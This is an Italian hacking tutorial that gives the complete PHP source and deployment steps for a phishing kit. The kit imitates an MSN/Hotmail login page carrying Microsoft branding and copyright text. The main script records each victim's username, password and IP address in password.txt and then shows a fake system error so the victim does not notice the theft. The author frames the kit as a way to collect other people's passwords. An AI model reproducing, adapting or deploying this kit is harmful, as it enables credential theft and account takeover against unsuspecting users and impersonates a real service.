MSN Password Grabber Whit Fake-Login
**********************************************************
Autore: KinG-LioN
MSN:
[email protected]
Info:
[email protected]
web:
Http://www.eurohackers.it
Origine:
http://kinglionweb.altervista.org/tutorial/msn.txt
**********************************************************
Componenti fake-login:
Index.php
Config.php
colori.php
hotmail77x19.gif
msn.gif
Stile.inc
colori.txt
password.txt
#Perch? questo progetto?
Ho deciso di creare questo Password Grabber, che potete riadattare a qualsiasi stile, cambiando le immagine, la parte HTML dell'index.php ed il colore da colori.txt, perche fino ad oggi TUTTI i password Grabber che ho visto in rete, si basano sui cgi-bin, permettendoci di ricevere una E-mail coi dati inseriti dalla Vittima, ad un indirizzo da noi scelto.
Questo sistema, oltre ad essere obsoleto e anche inutile nel 90% dei casi.
Primo perche al giorno d'oggi ? molto difficile riuscire a trovare un servizo gratuito che ci offre la gestione dei cgi-bin.
In secondo luogo, la vittima per inviarci i suoi dati deve inviare una "E-mail muta", quindi risulta indispensabile l'utilizzo da parte di quest'ultima di un client di posta elettronica quale ad esempio Outlook o Incredimail.
In Fine, anche nel caso in cui riuscissimo a trovare un fornitore di cgi-bin gratuito, e la nostra vittima usasse client di posta elettronica, al momento in cui senderebbe i dati, il suo client lo avviserebbe che un messaggio muto sta per essere inviato, chiedendo la conferma dell'invio alla vittima.
#Come nasce questa idea?
Un Giorno vidi in internet un fake-login che si basava su cgi-bin e decisi di provarlo, accorgendomi subito degli errori sopra descritti.
Quindi mi chiesi... Ma ci sar? un modo per non usare la gestione di e-mail per ricevere i dati?
A quesl punto pensai ai numerevoli GuestBook php che non facevano uso di database sql, i quali una volta scritto un messaggio, cliccando sull'apposito pulsante invia, stampava a video i campi immessi dall'utente su una pagina php.
Cosi Ho deciso di creare questo Fake-login basandomi su un GuestBook in php da me creato qualche mese prima.
Naturalmente Gli utenti non verranno mai rediretti sulla pagina nella quale vengono stampati i dati che dovr? rimanere segreta per tutti, tranne che per l'admin, ma verranno rediretti su una pagina di errore personalizzabile.
------------------------------------------[INIZIO FAKE-LOGIN]-----------------------------------------
Iniziare col creare un file da chiamere password.txt all'interno del quale verranno stampate automaticamente le password che riuscirete a racimolare, ed uplodarlo nella folder in cui sono presenti i vari file dello script.
Scaricare le immagini hotmail77x19.gif e msn.gif dai seguenti link's
http://kinglionweb.altervista.org/hotmail77x19.gif
http://kinglionweb.altervista.org/msn.gif ed uplodarle nella folder in cui avrete sharato i vari file.
-------------------------------------------------[index.php]------------------------------------------------------------
<?php
//Script Powered by KinG-LioN -
[email protected] -
http://www.eurohackers.it
include "colori.php" ;
include "config.php" ;
if(isset($_POST['submit'])){
$email = Strip_Tags($_POST['email']);
$pwd = Strip_Tags($_POST['nick']);
$ip = $_POST['ip'];
$data = date('j/n/y - H:i') ;
$dati_file = "password.txt";
// |
$riga_messaggio = "$pwd|$email|$data|$ip";
$riga_messaggio = str_replace("\n","<BR>",$riga_messaggio);
$riga_messaggio = stripslashes($riga_messaggio);
$riga_messaggio .= "\n";
$fp = fopen($dati_file, "a");
if(!$fp) {
echo "Errore! Non si puo aprire il file delle password";
exit;
}
$fw = fwrite($fp, $riga_messaggio);
$fc = fclose($fp);
echo "<b>Errore di sistema. Riprovare pi? tardi.<br></b>";
}
?>
<html>
<head>
<title>MSN Phishing by KinG-LioN</title>
<?php include "stile.inc" ;?>
<body>
<p></p>
<p></p>
<div align="center">
<p></p>
<p></p>
<p></p>
<p>
<div align="center">
<div align="center">
<h3> </h3>
<h3>Servizio di Gestione password fornito da MSN</h3>
<img border="0" src="hotmail77x19.gif" width="77" height="19"><img src=msn.gif>
<form name="formkinglion" method="post" action="<?php echo $_SERVER['PHP_SELF']; ?> ">
<p></p>
<p></p>
<table>
<tr>
<td><b>Nome Utente:</b></td>
<td><input type="text" name="email" value="
[email protected]" size=25></td>
</tr>
<tr>
<td><b>Password:</b></td>
<td><input type="password" name="nick" size=25></td>
</tr>
<tr>
<td></td>
<td></td>
</tr>
<tr>
<td>
<h5></h5>
</td>
<input name="ip" type="hidden" value="<?php echo $_SERVER['REMOTE_ADDR']; ?>">
<td align=right>
<p align="center"><input type="submit" name="submit" value="Accedi" id="bottoni"></p>
</td>
</tr>
</table>
</form>
<h4></a></h4>
</div>
</div>
</p>
</div>
<?php
echo "<div id='copy'> ? 2006 Microsoft Corporation. Tutti i diritti riservati.</div>";
?>
</body>
</html>
-------------------------------------[Fine index.php]------------------------------------------------
Copiare il tutto su NotePad, salvarlo con estensione .php ed uplodare il file.
-------------------------------------------------[colori.php]------------------------------------------------------------
<?php
//Script Powered by KinG-LioN -
[email protected] -
http://www.eurohackers.it
$datafile = "colori.txt";
if (file_exists($datafile)) {
$apro=fopen($datafile,"r");
$leggo=fread($apro,filesize($datafile));
fclose($apro);
$array_dati=explode("|",$leggo);
$bgcolor= $array_dati[0];
$fontcolor = $array_dati[1];
}
?>
--------------------------------------------[Fine colori.php]----------------------------------------
Copiare il tutto su NotePad, salvarlo con estensione .php ed uplodare il file.
-----------------------------------------------[config.php]---------------------------------------
<?php
// Imposta la tua password e se desideri ricevere una mail quando vengono inseriti i messaggi
//Script Powered by KinG-LioN -
[email protected] -
http://www.eurohackers.it
$pass= "";
$sendmail= 0; //imposta a 1 se vuoi ricevere la mail
$tuaemail = "
[email protected]";
?>
-------------------------------------------[Fine config.php]----------------------------------------
Copiare il tutto su NotePad, salvarlo con estensione .php ed uplodare il file.
----------------------------------------------[colori.txt]-----------------------------------------
#006699|white|4
----------------------------------------------[Fine colori.txt]--------------------------------------
Copiare il tutto su NotePad, salvarlo con estensione .txt ed uplodare il file.
-------------------------------------------------[Stile.inc]------------------------------------------
<?php
echo " <style type='text/css'>";
echo "BODY, TD {";
echo " font-family : Verdana, Arial, sans-serif ;";
echo " font-size : 9pt;";
echo " color:$fontcolor;";
echo " background: $bgcolor ;";
echo "}";
echo " A {FONT-WEIGHT: bold; COLOR:$fontcolor; TEXT-DECORATION: underline}";
echo " A:hover{FONT-WEIGHT: bold;COLOR: #e5e5e5; TEXT-DECORATION: none}";
echo "H2 {";
echo " font-size:18px;";
echo "}";
echo "H3 {";
echo " font-size: 15pt;";
echo " font-style: italic;";
echo " font-family: sans-serif;";
echo "}";
echo "H4 {";
echo " font-family: sans-serif;";
echo " font-size: 10pt;";
echo "}";
echo "HR {";
echo " background-color :$fontcolor;";
echo " border : dotted;";
echo "}";
echo "#bottoni {";
echo " background: $bgcolor ;";
echo " border-left: 2px solid $fontcolor;";
echo " border-right:2px solid Black;";
echo " border-top-color : 2px solid $fontcolor;";
echo " border-bottom-color : 2px solid Black;";
echo " color:$fontcolor;";
echo " padding : 2px;";
echo " font-weight : bold;";
echo "}";
echo "#copy {
font-size : xx-small;
text-align :center;
}";
echo "</style>";
?>
-------------------------------------------------[Fine Stile.inc]-------------------------------------
Copiare il tutto su NotePad, salvarlo con estensione .inc ed uplodare il file.
------------------------------------------------[FINE FAKE-LOGIN]-------------------------------------
#eurohackers.it